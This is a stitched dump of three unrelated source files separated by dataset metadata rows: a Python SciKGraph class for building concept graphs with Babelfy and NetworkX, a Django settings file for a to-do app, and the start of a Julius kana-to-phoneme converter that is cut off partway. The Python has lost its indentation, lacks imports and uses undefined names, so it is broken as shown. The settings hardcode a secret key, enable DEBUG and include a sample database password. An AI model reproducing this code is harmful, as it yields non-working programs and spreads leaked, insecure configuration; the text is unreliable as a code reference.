import os
import OClustR as OCR
import operator
#import nltk
class SciKGraph():
def __init__(self):#, BabelfyKey, inputFile, outputDirectory = './', distance_window = 2, language = 'EN', graphType = 'direct'):
#init variables
self.key = ''
self.inputFile = ''
self.outputDirectory = ''
self.distance_window = 0
self.graphName = []
self.dictionaries = []
self.dictionariesCode = []
self.graphsI = []
self.graphsD = []
self.sciKGraph = 0
self.pre_processed_graph = 0
self.dictionaryCodeMerged = {}
self.language = ''
self.deleted_nodes = []
self.deleted_edges = []
self.deleted_isolated_nodes = []
self.name=""
self.clusters = []
self.crisp_clusters = []
self.pre_processed_graph = nx.DiGraph()
#if self.outputDirectory[-1] != '/':
# self.outputDirectory = self.outputDirectory + '/'
#return higher and lower vertices weights
def marginalWeights(self, g):
min = sys.maxsize
max = 0
for n in g:
if g.nodes()[n]['peso'] < min:
min = g.nodes()[n]['peso']
if g.nodes()[n]['peso'] > max:
max = g.nodes()[n]['peso']
return max, min
#rank Concepts
def rank(self, g, dictionaryCodeMerged):
grau = nx.degree_centrality(g)
sorted_grau = sorted(grau.items(), key=operator.itemgetter(1), reverse=True)
sorted_concepts = []
for i in sorted_grau:
#sorted_concepts.append([dictionaryCodeMerged[i[0]], i[0]])
sorted_concepts.append(dictionaryCodeMerged[i[0]].lower().replace('+', ' ') + ' : ' + i[0])
return sorted_concepts
#key Concepts
def key_concepts(self, g, dictionaryCodeMerged):
grau = nx.degree_centrality(g)
sorted_grau = sorted(grau.items(), key=operator.itemgetter(1), reverse=True)
sorted_concepts = []
for i in sorted_grau:
sorted_concepts.append([dictionaryCodeMerged[i[0]], i[1]])
return sorted_concepts
# open and close file
def open_file(self,fileName):
file = open(fileName,"r")
text = file.read()
file.close()
return text
#parse and split text in chuncks of at most 3000 characters
def parse_text(self,text):
#remove special characters
punctuationToRemove = string.punctuation.replace('!','').replace('.','').replace('?','').replace('-','').replace(',','')
translator = str.maketrans('', '', punctuationToRemove)
parsedText = text.translate(translator)
#remove numbers
parsedText = re.sub(r'[0-9]+', '', parsedText)
#remove double spaces
parsedText = re.sub(r' ', ' ', parsedText)
#remove non-printable characters
parsedText = "".join(filter(lambda x: x in string.printable, parsedText))
#remove \t
parsedText = re.sub(r'\t', ' ', parsedText)
#remove spaces
parsedText = re.sub(r' ', '+', parsedText)
#split text in chuncks of at most 5000 characters
punctuation = ['.','?','!']
splitted_text = []
splitted_text.append("")
n_lines = len(parsedText.splitlines())
for line in parsedText.splitlines():
if n_lines == 1:
splitted_text[-1] = line
else:
if len(splitted_text[-1] + line) < 4500 and splitted_text[-1][-1:] not in punctuation or len(splitted_text[-1] + line) <= 3000:
splitted_text[-1] = splitted_text[-1] + '+' + line
else:
splitted_text.append(line)
translator = str.maketrans('', '', "?!.")
for l in splitted_text:
l = l.translate(translator)
return splitted_text
def frag(self,semantic_annotation, input_text):
start = semantic_annotation.char_fragment_start()
end = semantic_annotation.char_fragment_end()
return input_text[start:end+1]
def babelfy(self,lang, key, splitted_text):
babelapi = Babelfy()
#bn = BabelNet(key)
paragraphs_annotations = []
paragraphs_text = []
paragraphs_code = []
count = 0
for paragraph in splitted_text: #annotate each paragraph
words_annotations = []
words_text = []
words_code = []
semantic_annotations = babelapi.disambiguate(paragraph,lang,key,match="EXACT_MATCHING",cands="TOP",mcs="ON",anntype="ALL")
#exclude unused annotations (single words of multiword expressions)
for semantic_annotation in semantic_annotations:
if len(words_annotations) == 0 or words_annotations[-1].char_fragment_end() < semantic_annotation.char_fragment_start():
words_annotations.append(semantic_annotation)
words_text.append(self.frag(semantic_annotation,paragraph))
words_code.append(semantic_annotation.babel_synset_id())
elif words_annotations[-1].char_fragment_start() == semantic_annotation.char_fragment_start():
del words_annotations[-1]
words_annotations.append(semantic_annotation)
del words_text[-1]
words_text.append(self.frag(semantic_annotation,paragraph))
del words_code[-1]
words_code.append(semantic_annotation.babel_synset_id())
paragraphs_annotations.append(words_annotations)
paragraphs_text.append(words_text)
paragraphs_code.append(words_code)
count = count + 1
print(str(count) + '/' + str(len(splitted_text)))
return paragraphs_annotations, paragraphs_text, paragraphs_code
#Create the following Dicts
def create_dicts(self,paragraphs_text, paragraphs_code):
### dictionary[word] = code ###
### dictionaryCode[code] = word ###
### weight[code] = weight ###
dictionary={}
weight={}
dictionaryCode={}
for paragraph, codes in zip(paragraphs_text, paragraphs_code):
for word, code in zip(paragraph, codes):
if code not in weight:
weight[code] = 1
else:
weight[code] = weight[code] + 1
if word not in dictionary:
dictionary[word] = code
if code not in dictionaryCode:
dictionaryCode[code] = word
return dictionary, dictionaryCode, weight
def create_simple_graph(self,peso, paragraphs_code, dictionaryCode, dist):
g = nx.DiGraph() #indirect Graph
g2 = nx.DiGraph() #direct Grap
#calc the weight of each vertice
for code, weight in peso.items():
g.add_node(code, peso=weight, dicionario=dictionaryCode[code])
g2.add_node(code, peso=weight, dicionario=dictionaryCode[code])
#create and weight edges
for line in paragraphs_code:
i = 0
for word in line:
i = i + 1
j = 0
for word2 in line:
j = j + 1
if j - i < dist and j - i > 0: #indirect edges
if g.has_edge(word, word2):
g[word][word2]['weight'] += 1 - log(j-i,dist)
else:
if word != word2:
g.add_edge(word, word2, weight=float(1 - log(j-i,dist)))
if j - i == 1: #direct edges
if g2.has_edge(word, word2):
g2[word][word2]['weight'] += 1
else:
if word != word2:
g2.add_edge(word, word2, weight=1)
return g, g2
def save_clusters_txt(self, saveFile, Clusters):
f=open(saveFile,"w+")
for c in Clusters:
line = ''
for n in c:
line += n + ' '
f.write(line[:-1] + '\n')
f.close()
return
def saveClusters(self, saveFile="", Clusters=[], crisp="", clusterType='normal'):
file = ''
#save clusters
#write crisp
if crisp != "":
with open(saveFile + "crisp.pickle", "wb") as fp:
pickle.dump(crisp, fp, protocol=2)
f=open(saveFile + "crisp.txt","w+")
for c in crisp:
line = ''
for n in c:
line += n + ' '
f.write(line[:-1] + '\n')
f.close()
#write normal clusters
if clusterType =='normal':
with open(saveFile + "clusters.pickle", "wb") as fp:
pickle.dump(Clusters, fp, protocol=2)
f=open(saveFile + "clusters.txt","w+")
for c in Clusters:
line = ''
for n in c:
line += n + ' '
f.write(line[:-1] + '\n')
f.close()
#write reduced clusters
elif clusterType =='reduced':
with open(saveFile + "reducedClusters.pickle", "wb") as fp:
pickle.dump(Clusters, fp, protocol=2)
f=open(saveFile + "reducedClusters.txt","w+")
for c in Clusters:
line = ''
for n in c:
line += n + ' '
f.write(line[:-1] + '\n')
f.close()
else:
print('Wrong cluster Type!\nCluster not saved')
def save_variables_pickle(self):
save = []
save.append(self.graphName)
save.append(self.dictionaries)
save.append(self.dictionariesCode)
save.append(self.graphsI)
save.append(self.graphsD)
save.append(self.dictionaryCodeMerged)
save.append(self.sciKGraph)
save.append(self.crisp_clusters)
save.append(self.pre_processed_graph)
save.append(self.clusters)
file = pickle.dumps(save, protocol=2)
#with open('/home/mauro/Downloads/testeDownload.sckg', "wb") as fp:
# pickle.dump(save, fp, protocol=2)
return file
def save_variables(self,output_file, save_graph_name=False, save_directories = False, save_directories_code = False, save_graphs_i = False, save_graphs_d = False, save_directories_code_merged = False, save_SciKGraph = False, save_clusters = False, save_crisp_clusters = False, save_pre_processed_graph = False):
save = []
save.append(self.graphName)
save.append(self.dictionaries)
save.append(self.dictionariesCode)
save.append(self.graphsI)
save.append(self.graphsD)
save.append(self.dictionaryCodeMerged)
save.append(self.sciKGraph)
save.append(self.crisp_clusters)
save.append(self.pre_processed_graph)
save.append(self.clusters)
try:
with open(output_file, "wb") as fp:
pickle.dump(save, fp, protocol=2)
except:
raise
return
'''
try:
if save_graph_name:
with open(output_directory + "graphName.pickle", "wb") as fp:
pickle.dump(self.graphName, fp)
if save_directories:
with open(output_directory + "dictionaries.pickle", "wb") as fp:
pickle.dump(self.dictionaries, fp)
if save_directories_code:
with open(output_directory + "dictionariesCode.pickle", "wb") as fp:
pickle.dump(self.dictionariesCode, fp)
if save_graphs_i:
with open(output_directory + "graphsI.pickle", "wb") as fp:
pickle.dump(self.graphsI, fp)
if save_graphs_d:
with open(output_directory + "graphsD.pickle", "wb") as fp:
pickle.dump(self.graphsD, fp)
if save_directories_code_merged:
with open(output_directory + "dictionaryCodeMerged.pickle", "wb") as fp:
pickle.dump(self.dictionaryCodeMerged, fp)
if save_SciKGraph:
with open(output_directory + "sciKGraph.pickle", "wb") as fp:
pickle.dump(self.sciKGraph, fp)
if save_clusters:
with open(output_directory + "clusters.pickle", "wb") as fp:
pickle.dump(self.clusters, fp)
if save_crisp_clusters:
with open(output_directory + "crisp_clusters.pickle", "wb") as fp:
pickle.dump(self.crisp_clusters, fp)
if save_pre_processed_graph:
with open(output_directory + "pre_processed_graph.pickle", "wb") as fp:
pickle.dump(self.pre_processed_graph, fp)
except:
raise
'''
def open_variables_pickle(self, file):
data = pickle.load(file)
self.graphName = data[0]
self.dictionaries = data[1]
self.dictionariesCode = data[2]
self.graphsI = data[3]
self.graphsD = data[4]
self.dictionaryCodeMerged = data[5]
self.sciKGraph = data[6]
self.crisp_clusters = data[7]
self.pre_processed_graph = data[8]
self.clusters = data[9]
def open_variables(self,open_directory, open_graph_name=False, open_directories = False, open_directories_code = False, open_graph_i = False, open_graph_d = False, open_dictionary_code_merged = False, open_SciKGraph = False, open_clusters = False, open_crisp_clusters = False, open_pre_processed_graph = False):
with open(open_directory, "rb") as fp:
data = pickle.load(fp)
self.graphName = data[0]
self.dictionaries = data[1]
self.dictionariesCode = data[2]
self.graphsI = data[3]
self.graphsD = data[4]
self.dictionaryCodeMerged = data[5]
self.sciKGraph = data[6]
self.crisp_clusters = data[7]
self.pre_processed_graph = data[8]
self.clusters = data[9]
return
'''
try:
if open_graph_name:
with open (open_directory + "graphName.pickle", 'rb') as fp:
self.graphName = pickle.load(fp)
if open_directories:
with open (open_directory + "dictionaries.pickle", 'rb') as fp:
self.dictionaries = pickle.load(fp)
if open_directories_code:
with open (open_directory + "dictionariesCode.pickle", 'rb') as fp:
self.dictionariesCode = pickle.load(fp)
if open_graph_i:
with open (open_directory + "graphsI.pickle", 'rb') as fp:
self.graphsI = pickle.load(fp)
if open_graph_d:
with open (open_directory + "graphsD.pickle", 'rb') as fp:
self.graphsD = pickle.load(fp)
if open_dictionary_code_merged:
with open (open_directory + "dictionaryCodeMerged.pickle", 'rb') as fp:
self.dictionaryCodeMerged = pickle.load(fp)
if open_SciKGraph:
with open (open_directory + "sciKGraph.pickle", 'rb') as fp:
self.sciKGraph = pickle.load(fp)
if open_clusters:
with open (open_directory + "clusters.pickle", 'rb') as fp:
self.clusters = pickle.load(fp)
if open_crisp_clusters:
with open (open_directory + "crisp_clusters.pickle", 'rb') as fp:
self.crisp_clusters = pickle.load(fp)
if open_pre_processed_graph:
with open (open_directory + "pre_processed_graph.pickle", 'rb') as fp:
self.pre_processed_graph = pickle.load(fp)
except:
raise
'''
def clear_variables(self):
self.key = ''
self.inputFile = ''
self.outputDirectory = ''
self.distance_window = 0
self.graphName = []
self.dictionaries = []
self.dictionariesCode = []
self.graphsI = []
self.graphsD = []
self.sciKGraph = 0
self.pre_processed_graph = 0
self.dictionaryCodeMerged = {}
self.language = ''
self.deleted_nodes = []
self.deleted_edges = []
self.deleted_isolated_nodes = []
self.name=""
self.clusters = []
self.crisp_clusters = []
self.pre_processed_graph = nx.DiGraph()
return
def create_single_SciKGraph(self,filename, babelfy_key, language, distance_window):
text = filename.decode('ascii')
st = self.parse_text(text)
pa, pt, pc = self.babelfy(language, babelfy_key, st)
d, dc, p = self.create_dicts(pt, pc)
gI, gD = self.create_simple_graph(p, pc, dc, distance_window)
return d, dc, gI, gD
#Merges graphs and dictionaries
## graphs: list of graphs to merge
## dictionaryCode: list of the graphs dictionaries
def merge_graphs(self,graphs, dictionaryCode):
#create dictionaryCodeMerged
dictionaryCodeMerged = {}
for dic in dictionaryCode:
for w in dic:
if w not in dictionaryCodeMerged:
dictionaryCodeMerged[w] = dic[w]
#merge graphs
graph = nx.compose_all(graphs).copy()
#reset nodes weights
for i in graph.nodes():
graph.nodes()[i]['peso'] = 0
#recalc nodes weights
for i in range(len(graphs)):
for n in graphs[i]:
graph.nodes()[n]['peso'] += graphs[i].nodes()[n]['peso']
graph.nodes()[n]['dicionario'] = dictionaryCodeMerged[n]
#reset arc weight
for i in graph.edges():
graph[i[0]][i[1]]['weight'] = 0
#recalc arc weight
for i in range(len(graphs)):
for e in graphs[i].edges():
graph[e[0]][e[1]]['weight'] += graphs[i][e[0]][e[1]]['weight']
return graph, dictionaryCodeMerged
def create_SciKGraph(self, files, file_names, babelfy_key = None, language = 'EN', graphType = 'direct', distance_window=2, mergeIfFail = False):
distance_window = distance_window + 1
if distance_window <=2:
graphType = 'direct'
else:
graphType = 'indirect'
self.language = language
#check if scikgraph should be fully updated (occurs when distance window changes)
if self.distance_window != distance_window:
self.distance_window = distance_window
self.graphName = []
toMerge = []
count = 0
added = 0
for file, file_name in zip(files, file_names):
count += 1
if file_name not in self.graphName:
try:
d, dc, gI, gD = self.create_single_SciKGraph(file, babelfy_key, language, distance_window)
self.graphName.append(file_name)
self.dictionaries.append(d)
self.dictionariesCode.append(dc)
self.graphsI.append(gI)
self.graphsD.append(gD)
added += 1
except Exception as e:
if len(self.graphName) > 0 or mergeIfFail:
print('Error Babelfying text (check your Babelcoins)\n', e, '\n')
print(self.graphName, '\nThe documents in \'graphName\' were correctly babelfied.\nThe SciKGraph was created with the correctly babelfied texts, to update this version with the other texts fix the error (probably babelfy key error) and run this method again.')
break
else:
if len(self.graphName) > 0:
print(self.graphName, '\nThe documents in \'graphName\' were correctly babelfied.\nTo create the SciKGraph (using the previously babelfied documents) run this method again.\n')
print('Error Babelfying text (check your Babelcoins)\n')
raise
if graphType == 'direct':
toMerge = self.graphsD
elif graphType == 'indirect':
toMerge = self.graphsI
else:
print('graphType not listed!\nDirect graph used.')
toMerge = self.graphsD
#check if at leat 1 graph can be added to scikgraph
if added > 0:
graph, dictionaryMerged = self.merge_graphs(toMerge, self.dictionariesCode)
self.sciKGraph = graph
self.dictionaryCodeMerged = dictionaryMerged
return self.sciKGraph, self.dictionaryCodeMerged
def find_communities(self, g, edges_threshold, nodes_threshold):
ocr = OCR.OClustR()
self.clusters, self.crisp_clusters, self.pre_processed_graph = ocr.identify_clusters(g, edges_threshold, nodes_threshold)
return self.clusters, self.crisp_clusters, self.pre_processed_graph
def cluster_graph(self, g):
ocr = OCR.OClustR()
self.clusters, self.crisp_clusters, self.sciKGraph = ocr.cluster_graph(g)
return
def pre_process_graph(self, g, edges_threshold, nodes_threshold, list_edges = [], list_nodes = []):
oClustR = OCR.OClustR()
g, rem_e, rem_n, rem_iso_n = oClustR.pre_process(g, edges_threshold, nodes_threshold, list_edges, list_nodes)
self.pre_processed_graph = g
self.deleted_isolated_nodes = rem_iso_n
self.deleted_nodes = rem_n
self.deleted_edges = rem_e
return
def to_crisp(self, Clusters):
##Crisp Cluster
crisp = []
elem = []
for c in Clusters:
cl = []
for v in c:
if v not in elem:
cl.append(v)
elem.append(v)
if len(cl) >= 1:
crisp.append(cl)
return crisp
def start(self, inputDirectory, babelfy_key, edges_threshold=0, nodes_threshold=0, list_nodes = [], list_edges = [], language = 'EN', graphType = 'direct', distance_window=2, mergeIfFail = False):
if babelfy_key == None:
babelfy_key = self.key
filenames = []
try:
for filename in sorted(glob.glob(os.path.join(inputDirectory, '*.txt'))):
filenames.append(filename)
if len(filename) == 0:
raise EmptyDirectoryError('There is no .txt file in the inputDirectory.')
except:
raise
self.sciKGraph, self.dictionaryCodeMerged = self.create_SciKGraph(filenames, babelfy_key, language, graphType, distance_window, mergeIfFail)
return self.sciKGraph
#oClustR = OCR.OClustR()
#self.clusters, self.crisp_clusters, self.pre_processed_graph = oClustR.identify_clusters(self.sciKGraph, edges_threshold, nodes_threshold)
#return self.clusters, self.pre_processed_graph
| 36.77551 | 315 | 0.565525 |
79461ebf8433b867d5c8b35acd21b5a0727644f3 | 3,408 | py | Python | mirror_to_do_list/settings.py | hadeel36/Mirror-to-do-list | b2b018e3771357005068f355d60a95313874e16d | [
"MIT"
] | null | null | null | mirror_to_do_list/settings.py | hadeel36/Mirror-to-do-list | b2b018e3771357005068f355d60a95313874e16d | [
"MIT"
] | null | null | null | mirror_to_do_list/settings.py | hadeel36/Mirror-to-do-list | b2b018e3771357005068f355d60a95313874e16d | [
"MIT"
] | null | null | null | """
Django settings for mirror_to_do_list project.
Generated by 'django-admin startproject' using Django 1.11.11.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'f*0yo97bbi3_a4s4!600mz-3b16csm*mnx^=p^$=$po5me@97$'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'todos.apps.TodosConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mirror_to_do_list.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mirror_to_do_list.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
import dj_database_url
DATABASES['default'] = dj_database_url.config()
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.mysql',
# 'NAME': 'todolist',
# 'USER': 'root',
# 'PASSWORD': '123456',
# 'HOST': '',
# 'PORT': ''
# }
# }
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
# Configure Django App for Heroku.
import django_heroku
django_heroku.settings(locals())
| 25.62406 | 91 | 0.689847 |
79461f8faaa95d45a1614a1c45442f3cd414e6dc | 16,192 | py | Python | julius4seg/sp_inserter.py | yamachu/julius4seg | 2d701f451d854aa9ed00cd7c1a0cf5ecfa83b036 | [
"MIT"
] | 7 | 2018-04-15T09:02:09.000Z | 2021-11-07T08:29:22.000Z | julius4seg/sp_inserter.py | yamachu/julius4seg | 2d701f451d854aa9ed00cd7c1a0cf5ecfa83b036 | [
"MIT"
] | 2 | 2020-01-22T17:21:09.000Z | 2020-02-16T20:26:44.000Z | julius4seg/sp_inserter.py | yamachu/julius4seg | 2d701f451d854aa9ed00cd7c1a0cf5ecfa83b036 | [
"MIT"
] | 2 | 2018-04-16T21:50:51.000Z | 2020-01-21T16:03:39.000Z | import os
import re
import sys
import subprocess
from itertools import chain
from pathlib import Path, PurePath
from logging import getLogger, DEBUG, NullHandler
logger = getLogger(__name__)
logger.addHandler(NullHandler())
logger.setLevel(DEBUG)
logger.propagate = False
# MUST CHANGE
JULIUS_ROOT = PurePath('.')
def get_os_dependent_directory() -> str:
'''Juluis Segmentaion-Kitのディレクトリ名をOSの種類から取得
returns:
(str): OS依存のパスの一部
'''
if sys.platform.startswith('win') or sys.platform.startswith('cygwin'):
return 'windows'
elif sys.platform.startswith('darwin'):
return 'osx'
elif sys.platform.startswith('linux'):
return 'linux'
def get_os_dependent_exec() -> str:
'''Juliusの実行ファイル名を取得
returns:
(str): Juliusの実行ファイル名
'''
if sys.platform.startswith('win') or sys.platform.startswith('cygwin'):
return 'julius.exe'
else:
return 'julius'
def kata2hira(kana: str) -> str:
'''ヴ,ヵ,ヶ以外のカタカナをひらがなに変換
args:
kana(str): カタカナ文字列
"ヤキニク"
returns:
(str): ひらがな文字列
"やきにく"
'''
return ''.join([chr(ord(c) + ord('あ') - ord('ア')) if c != 'ー' else 'ー' for c in kana])
def conv2julius(s: str) -> str:
'''入力の単語の読み(ひらがな)をJuliusの音素列に変換
args:
kana(str): カタカナ文字列
"やきにく"
returns:
(str): ひらがな文字列
" y a k i n i k u"
'''
s = s.replace('あぁ',' a a')
s = s.replace('いぃ',' i i')
s = s.replace('いぇ',' i e')
s = s.replace('いゃ',' y a')
s = s.replace('うぅ',' u:')
s = s.replace('えぇ',' e e')
s = s.replace('おぉ',' o:')
s = s.replace('かぁ',' k a:')
s = s.replace('きぃ',' k i:')
s = s.replace('くぅ',' k u:')
s = s.replace('くゃ',' ky a')
s = s.replace('くゅ',' ky u')
s = s.replace('くょ',' ky o')
s = s.replace('けぇ',' k e:')
s = s.replace('こぉ',' k o:')
s = s.replace('がぁ',' g a:')
s = s.replace('ぎぃ',' g i:')
s = s.replace('ぐぅ',' g u:')
s = s.replace('ぐゃ',' gy a')
s = s.replace('ぐゅ',' gy u')
s = s.replace('ぐょ',' gy o')
s = s.replace('げぇ',' g e:')
s = s.replace('ごぉ',' g o:')
s = s.replace('さぁ',' s a:')
s = s.replace('しぃ',' sh i:')
s = s.replace('すぅ',' s u:')
s = s.replace('すゃ',' sh a')
s = s.replace('すゅ',' sh u')
s = s.replace('すょ',' sh o')
s = s.replace('せぇ',' s e:')
s = s.replace('そぉ',' s o:')
s = s.replace('ざぁ',' z a:')
s = s.replace('じぃ',' j i:')
s = s.replace('ずぅ',' z u:')
s = s.replace('ずゃ',' zy a')
s = s.replace('ずゅ',' zy u')
s = s.replace('ずょ',' zy o')
s = s.replace('ぜぇ',' z e:')
s = s.replace('ぞぉ',' z o:')
s = s.replace('たぁ',' t a:')
s = s.replace('ちぃ',' ch i:')
s = s.replace('つぁ',' ts a')
s = s.replace('つぃ',' ts i')
s = s.replace('つぅ',' ts u:')
s = s.replace('つゃ',' ch a')
s = s.replace('つゅ',' ch u')
s = s.replace('つょ',' ch o')
s = s.replace('つぇ',' ts e')
s = s.replace('つぉ',' ts o')
s = s.replace('てぇ',' t e:')
s = s.replace('とぉ',' t o:')
s = s.replace('だぁ',' d a:')
s = s.replace('ぢぃ',' j i:')
s = s.replace('づぅ',' d u:')
s = s.replace('づゃ',' zy a')
s = s.replace('づゅ',' zy u')
s = s.replace('づょ',' zy o')
s = s.replace('でぇ',' d e:')
s = s.replace('どぉ',' d o:')
s = s.replace('なぁ',' n a:')
s = s.replace('にぃ',' n i:')
s = s.replace('ぬぅ',' n u:')
s = s.replace('ぬゃ',' ny a')
s = s.replace('ぬゅ',' ny u')
s = s.replace('ぬょ',' ny o')
s = s.replace('ねぇ',' n e:')
s = s.replace('のぉ',' n o:')
s = s.replace('はぁ',' h a:')
s = s.replace('ひぃ',' h i:')
s = s.replace('ふぅ',' f u:')
s = s.replace('ふゃ',' hy a')
s = s.replace('ふゅ',' hy u')
s = s.replace('ふょ',' hy o')
s = s.replace('へぇ',' h e:')
s = s.replace('ほぉ',' h o:')
s = s.replace('ばぁ',' b a:')
s = s.replace('びぃ',' b i:')
s = s.replace('ぶぅ',' b u:')
s = s.replace('ふゃ',' hy a')
s = s.replace('ぶゅ',' by u')
s = s.replace('ふょ',' hy o')
s = s.replace('べぇ',' b e:')
s = s.replace('ぼぉ',' b o:')
s = s.replace('ぱぁ',' p a:')
s = s.replace('ぴぃ',' p i:')
s = s.replace('ぷぅ',' p u:')
s = s.replace('ぷゃ',' py a')
s = s.replace('ぷゅ',' py u')
s = s.replace('ぷょ',' py o')
s = s.replace('ぺぇ',' p e:')
s = s.replace('ぽぉ',' p o:')
s = s.replace('まぁ',' m a:')
s = s.replace('みぃ',' m i:')
s = s.replace('むぅ',' m u:')
s = s.replace('むゃ',' my a')
s = s.replace('むゅ',' my u')
s = s.replace('むょ',' my o')
s = s.replace('めぇ',' m e:')
s = s.replace('もぉ',' m o:')
s = s.replace('やぁ',' y a:')
s = s.replace('ゆぅ',' y u:')
s = s.replace('ゆゃ',' y a:')
s = s.replace('ゆゅ',' y u:')
s = s.replace('ゆょ',' y o:')
s = s.replace('よぉ',' y o:')
s = s.replace('らぁ',' r a:')
s = s.replace('りぃ',' r i:')
s = s.replace('るぅ',' r u:')
s = s.replace('るゃ',' ry a')
s = s.replace('るゅ',' ry u')
s = s.replace('るょ',' ry o')
s = s.replace('れぇ',' r e:')
s = s.replace('ろぉ',' r o:')
s = s.replace('わぁ',' w a:')
s = s.replace('をぉ',' o:')
s = s.replace('ゔ',' b u')
s = s.replace('でぃ',' d i')
s = s.replace('でぇ',' d e:')
s = s.replace('でゃ',' dy a')
s = s.replace('でゅ',' dy u')
s = s.replace('でょ',' dy o')
s = s.replace('てぃ',' t i')
s = s.replace('てぇ',' t e:')
s = s.replace('てゃ',' ty a')
s = s.replace('てゅ',' ty u')
s = s.replace('てょ',' ty o')
s = s.replace('すぃ',' s i')
s = s.replace('ずぁ',' z u a')
s = s.replace('ずぃ',' z i')
s = s.replace('ずぅ',' z u')
s = s.replace('ずゃ',' zy a')
s = s.replace('ずゅ',' zy u')
s = s.replace('ずょ',' zy o')
s = s.replace('ずぇ',' z e')
s = s.replace('ずぉ',' z o')
s = s.replace('きゃ',' ky a')
s = s.replace('きゅ',' ky u')
s = s.replace('きょ',' ky o')
s = s.replace('しゃ',' sh a')
s = s.replace('しゅ',' sh u')
s = s.replace('しぇ',' sh e')
s = s.replace('しょ',' sh o')
s = s.replace('ちゃ',' ch a')
s = s.replace('ちゅ',' ch u')
s = s.replace('ちぇ',' ch e')
s = s.replace('ちょ',' ch o')
s = s.replace('とぅ',' t u')
s = s.replace('とゃ',' ty a')
s = s.replace('とゅ',' ty u')
s = s.replace('とょ',' ty o')
s = s.replace('どぁ',' d o a')
s = s.replace('どぅ',' d u')
s = s.replace('どゃ',' dy a')
s = s.replace('どゅ',' dy u')
s = s.replace('どょ',' dy o')
s = s.replace('どぉ',' d o:')
s = s.replace('にゃ',' ny a')
s = s.replace('にゅ',' ny u')
s = s.replace('にょ',' ny o')
s = s.replace('ひゃ',' hy a')
s = s.replace('ひゅ',' hy u')
s = s.replace('ひょ',' hy o')
s = s.replace('みゃ',' my a')
s = s.replace('みゅ',' my u')
s = s.replace('みょ',' my o')
s = s.replace('りゃ',' ry a')
s = s.replace('りゅ',' ry u')
s = s.replace('りょ',' ry o')
s = s.replace('ぎゃ',' gy a')
s = s.replace('ぎゅ',' gy u')
s = s.replace('ぎょ',' gy o')
s = s.replace('ぢぇ',' j e')
s = s.replace('ぢゃ',' j a')
s = s.replace('ぢゅ',' j u')
s = s.replace('ぢょ',' j o')
s = s.replace('じぇ',' j e')
s = s.replace('じゃ',' j a')
s = s.replace('じゅ',' j u')
s = s.replace('じょ',' j o')
s = s.replace('びゃ',' by a')
s = s.replace('びゅ',' by u')
s = s.replace('びょ',' by o')
s = s.replace('ぴゃ',' py a')
s = s.replace('ぴゅ',' py u')
s = s.replace('ぴょ',' py o')
s = s.replace('うぁ',' u a')
s = s.replace('うぃ',' w i')
s = s.replace('うぇ',' w e')
s = s.replace('うぉ',' w o')
s = s.replace('ふぁ',' f a')
s = s.replace('ふぃ',' f i')
s = s.replace('ふぅ',' f u')
s = s.replace('ふゃ',' hy a')
s = s.replace('ふゅ',' hy u')
s = s.replace('ふょ',' hy o')
s = s.replace('ふぇ',' f e')
s = s.replace('ふぉ',' f o')
# 1音からなる変換規則
s = s.replace('あ',' a')
s = s.replace('い',' i')
s = s.replace('う',' u')
s = s.replace('え',' e')
s = s.replace('お',' o')
s = s.replace('か',' k a')
s = s.replace('き',' k i')
s = s.replace('く',' k u')
s = s.replace('け',' k e')
s = s.replace('こ',' k o')
s = s.replace('さ',' s a')
s = s.replace('し',' sh i')
s = s.replace('す',' s u')
s = s.replace('せ',' s e')
s = s.replace('そ',' s o')
s = s.replace('た',' t a')
s = s.replace('ち',' ch i')
s = s.replace('つ',' ts u')
s = s.replace('て',' t e')
s = s.replace('と',' t o')
s = s.replace('な',' n a')
s = s.replace('に',' n i')
s = s.replace('ぬ',' n u')
s = s.replace('ね',' n e')
s = s.replace('の',' n o')
s = s.replace('は',' h a')
s = s.replace('ひ',' h i')
s = s.replace('ふ',' f u')
s = s.replace('へ',' h e')
s = s.replace('ほ',' h o')
s = s.replace('ま',' m a')
s = s.replace('み',' m i')
s = s.replace('む',' m u')
s = s.replace('め',' m e')
s = s.replace('も',' m o')
s = s.replace('ら',' r a')
s = s.replace('り',' r i')
s = s.replace('る',' r u')
s = s.replace('れ',' r e')
s = s.replace('ろ',' r o')
s = s.replace('が',' g a')
s = s.replace('ぎ',' g i')
s = s.replace('ぐ',' g u')
s = s.replace('げ',' g e')
s = s.replace('ご',' g o')
